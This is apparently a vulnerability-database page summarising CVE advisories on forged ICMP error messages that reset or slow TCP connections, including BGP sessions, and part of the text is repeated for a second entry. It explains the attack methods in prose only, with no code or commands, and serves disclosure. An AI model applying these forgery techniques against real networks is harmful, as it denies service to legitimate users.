The original design of ICMP does not require authentication for host-generated ICMP error messages, which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged "Destination Unreachable" messages, (2) blind throughput-reduction attacks with forged "Source Quench" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.
ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.
Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.
The following individual attacks are reported:
- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.
A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.
- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
**Update: Microsoft platforms are also reported prone to these issues
VAR-200412-1123 | CVE-2005-0067 |
The Border Gateway Protocol relies on persistent TCP sessions without specifying authentication requirements
Related entries in the VARIoT exploits database: VAR-E-200504-0005, VAR-E-200504-0002, VAR-E-200504-0006 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The original design of TCP does not require that port numbers be assigned randomly (aka "Port randomization"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged "Destination Unreachable" messages, (2) blind throughput-reduction attacks with forged "Source Quench" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.
ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.
Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.
The following individual attacks are reported:
- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.
A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.
- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
**Update: Microsoft platforms are also reported prone to these issues